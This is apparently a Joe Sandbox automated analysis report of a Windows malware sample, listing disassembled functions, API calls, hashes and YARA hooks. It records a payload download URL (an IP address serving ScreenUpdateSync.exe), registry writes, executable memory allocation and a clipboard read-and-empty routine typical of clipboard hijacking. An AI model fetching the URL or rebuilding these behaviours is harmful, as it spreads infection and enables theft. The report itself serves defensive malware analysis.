                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00434804,00000000,00000000,0040DDD5,00000002,?,0042C161,?,00000000,00000000,00000001,?,0040DDD5,?,0042C216), ref: 00434798
                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 0043479F
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2336955059-0
                                                                                                                                                                                                                                                                    • Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                                                                                                                                                                                                                                    • Instruction ID: bcc915797d3e420762720933ca2114d92cc1cd6946a03aaf12616f5971efc3d8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01016836710114ABCB148FAADC059EE7B29EFCA730F24020AF81487290EB35ED118B98
                                                                                                                                                                                                                                                                    Function 00402BAD Relevance: 4.5, APIs: 3, Instructions: 41registryCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 470 402bad-402bd9 RegCreateKeyExW 471 402bdb-402bed RegSetValueExW 470->471 472 402bef-402bf2 470->472 471->472 473 402bf4-402bf7 RegCloseKey 472->473 474 402bfd-402c03 472->474 473->474
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BCF
                                                                                                                                                                                                                                                                    • RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BE7
                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BF7
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseCreateValue
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1818849710-0
                                                                                                                                                                                                                                                                    • Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                                                                                                                                                                                                                    • Instruction ID: 415a99b38b1cf926e07f2752f011508d1a06d6109c2dcef31e57e84081a4d25d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ABF0B4B650011CFFEB214F94DD89DBBBA7CEB007E9F100175FA01B2150D6B19E009664
                                                                                                                                                                                                                                                                    Function 0042E074 Relevance: 4.5, APIs: 3, Instructions: 31threadCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 475 42e074-42e081 call 431f5e 478 42e083-42e086 ExitThread 475->478 479 42e08c-42e094 475->479 479->478 480 42e096-42e09a 479->480 481 42e0a1-42e0a7 480->481 482 42e09c call 4354f6 480->482 484 42e0b4-42e0ba 481->484 485 42e0a9-42e0ab 481->485 482->481 484->478 487 42e0bc-42e0be 484->487 485->484 486 42e0ad-42e0ae CloseHandle 485->486 486->484 487->478 488 42e0c0-42e0ca FreeLibraryAndExitThread 487->488
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 00431F5E: GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
                                                                                                                                                                                                                                                                      • Part of subcall function 00431F5E: _free.LIBCMT ref: 00431F98
                                                                                                                                                                                                                                                                      • Part of subcall function 00431F5E: SetLastError.KERNEL32(00000000), ref: 00431FCC
                                                                                                                                                                                                                                                                    • ExitThread.KERNEL32 ref: 0042E086
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0AE
                                                                                                                                                                                                                                                                    • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0C4
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1198197534-0
                                                                                                                                                                                                                                                                    • Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                                                                                                                                                                                                    • Instruction ID: 941e5d7bb2069d1fb9760ffb86e13a1db41397deee20687f00b4917166382ed0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1BF054302006347BD735AF27E808A5B7A986F41775F584715FC25C22A1D768DD838659
                                                                                                                                                                                                                                                                    Function 0040239E Relevance: 3.1, APIs: 2, Instructions: 125windowCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 489 40239e-4023ac 490 402561-402563 PostQuitMessage 489->490 491 4023b2-4023b7 489->491 492 402569-40256e 490->492 493 4023d0-4023d7 491->493 494 4023b9-4023cb DefWindowProcW 491->494 495 4023d9 call 401da4 493->495 496 4023de-4023e5 493->496 494->492 495->496 496->492 498 4023eb-40255f call 4010ba call 4029f4 496->498 498->492
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 004023C5
                                                                                                                                                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00402563
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: MessagePostProcQuitWindow
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3873111417-0
                                                                                                                                                                                                                                                                    • Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                                                                                                                                                                                    • Instruction ID: 43c76da2243f772c6aced19a3fe0e8e69066b3bbdff08d4cabba9d560eb75400
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02412E25A64340A5E730EFA5BD55B2633B0FF64722F10252BE528DB2B2E3B28540C35E
                                                                                                                                                                                                                                                                    Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101sleepCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 503 40155a-4016d0 Sleep call 4010ba 505 4016d5-4016d9 503->505
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00001D1B), ref: 00401562
                                                                                                                                                                                                                                                                      • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                                                                                                                                                                                                      • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _wcslen$Sleep
                                                                                                                                                                                                                                                                    • String ID: http://176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                                                                    • API String ID: 3358372957-3120454669
                                                                                                                                                                                                                                                                    • Opcode ID: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
                                                                                                                                                                                                                                                                    • Instruction ID: 033e26d6726dec48d9da5d172e0a3ce7e355aee553d479aaec466036f4edd3d7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83319A15A6538094E330CFA0BC95A662330FF64B52F50653BD60CCB2B2E7A18587C35E
                                                                                                                                                                                                                                                                    Function 00402960 Relevance: 3.0, APIs: 2, Instructions: 49COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0040298F
                                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 0040299F
                                                                                                                                                                                                                                                                      • Part of subcall function 00402823: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2843524283-0
                                                                                                                                                                                                                                                                    • Opcode ID: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
                                                                                                                                                                                                                                                                    • Instruction ID: f5c656a3c742482aaca5e7be5327d781ae1f97b048d34cfcbeac2439ecd5e81b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C901D6B1E0021C5ADB25FA25EC46BEE77689B41304F0041BFA605E31C1E9B85E85CAD8
                                                                                                                                                                                                                                                                    Function 024C0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000400,?,?,024C0223,?,?), ref: 024C0E19
                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,024C0223,?,?), ref: 024C0E1E
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorMode
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                    • Instruction ID: 19e3bb3d86d1ccb7e2d50aa8a73f4fa727658f1bcbf078656ba80fd3e822a18e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82D01235145128B7D7403A94DC09BDE7B1CDF05B66F108011FB0DD9180C770954046E5
                                                                                                                                                                                                                                                                    Function 00434186 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                                                                                                                                                                                                    • Instruction ID: 5858c2b1917228bc3ee007884971bc5cb621fb913b3acd2bc442863518e7715d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4051D531A00218AFDB10DF59C840BEA7BA1EFC9364F19919AF818AB391C779FD42C754
                                                                                                                                                                                                                                                                    Function 0040369F Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: __fread_nolock
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2638373210-0
                                                                                                                                                                                                                                                                    • Opcode ID: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
                                                                                                                                                                                                                                                                    • Instruction ID: e1021867f2ec77c7d2f8cf192b2e918c2079a777806a714b314ab491ad94b1c1
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5831ADB1604312AFC710DF2AC88092ABFA9BF84351F04893EFD4497390D739DA548B8A
                                                                                                                                                                                                                                                                    Function 00402823 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 323602529-0
                                                                                                                                                                                                                                                                    • Opcode ID: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
                                                                                                                                                                                                                                                                    • Instruction ID: a0c314b69e82cee7068a10c27dc1ba61f54dd3d6c342bb4161a68c9c894be626
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B03118B4D002199BDB14EFA5D881AEDBBB4BF08304F5085AEE415B3281DB786A49CF54
                                                                                                                                                                                                                                                                    Function 00403CC2 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: H_prolog3_catch
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3886170330-0
                                                                                                                                                                                                                                                                    • Opcode ID: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
                                                                                                                                                                                                                                                                    • Instruction ID: b71381d5bc9e259bdf0532d7d2dd1dfab3929909e68e206b89482bd8707b5f49
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F215E70600205DFCB11DF55C580EADBBB5BF48704F14C06EE815AB3A2C778AE50CB94
                                                                                                                                                                                                                                                                    Function 00432785 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: __wsopen_s
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3347428461-0
                                                                                                                                                                                                                                                                    • Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                                                                                                                                                                                                    • Instruction ID: ced19a79aea4b3e33dd998471e9e3f3b23a78e9704dbb7c6d54aa915c2495f90
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3911187590420AAFCF05DF58E94199B7BF4FF4C314F10406AF819AB311D671EA25CBA9
                                                                                                                                                                                                                                                                    Function 0043CFCB Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                                                                                                                    • Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                                                                                                                                                                                                    • Instruction ID: e101c5f3f91c4e465480e224300ffd561ec2350ede5005b950df212ed8b6fbff
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6F0BE33910008FBCF159E96DC01DDF3B6EEF8D338F100116F91492150DA3ACA21ABA4
                                                                                                                                                                                                                                                                    Function 004336A7 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                    • Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                                                                                                                                                                                                    • Instruction ID: 0777d31d9fa185a8b849a759fdbdb2b75b345829f9b614c7a8fa7ff1ccc7c9d0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AAE0E5313002207FD6303E675D07B5B36489F497A6F042127EC05A23D0DA6DEE0085AD
                                                                                                                                                                                                                                                                    Function 0040FB0C Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004103C7
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Exception@8Throw
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2005118841-0
                                                                                                                                                                                                                                                                    • Opcode ID: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
                                                                                                                                                                                                                                                                    • Instruction ID: a93cbdcc7b8cec239d3e65b0583cf012edeaa99edf8fc6fd77b2b60b17382ec4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 58E09B3450430E76CB1476A5FC1595D376C6A00354B904237BC28654D1DF78F59D858D
                                                                                                                                                                                                                                                                    Function 0043CD0A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                                                                                    • Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                                                                                                                                                                                                                    • Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95
                                                                                                                                                                                                                                                                    Function 009F9C05 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 009F9C56
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623077365.00000000009F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 009F9000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9f9000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                    • Instruction ID: 6f6d5a8ec73014d56f3bcff3e7fd30232263f24054d49edfb9c460e100f92e22
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C113F79A00208EFDB01DF98C985E98BFF5AF08350F058094FA489B361D371EA50DF90

                                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                                    Function 024C1942 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 151clipboardsleepmemoryCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 024C194D
                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00001541), ref: 024C1957
                                                                                                                                                                                                                                                                      • Part of subcall function 024CCE77: _strlen.LIBCMT ref: 024CCE8E
                                                                                                                                                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 024C1984
                                                                                                                                                                                                                                                                    • GetClipboardData.USER32(00000001), ref: 024C1994
                                                                                                                                                                                                                                                                    • _strlen.LIBCMT ref: 024C19B0
                                                                                                                                                                                                                                                                    • _strlen.LIBCMT ref: 024C19DF
                                                                                                                                                                                                                                                                    • _strlen.LIBCMT ref: 024C1B23
                                                                                                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 024C1B39
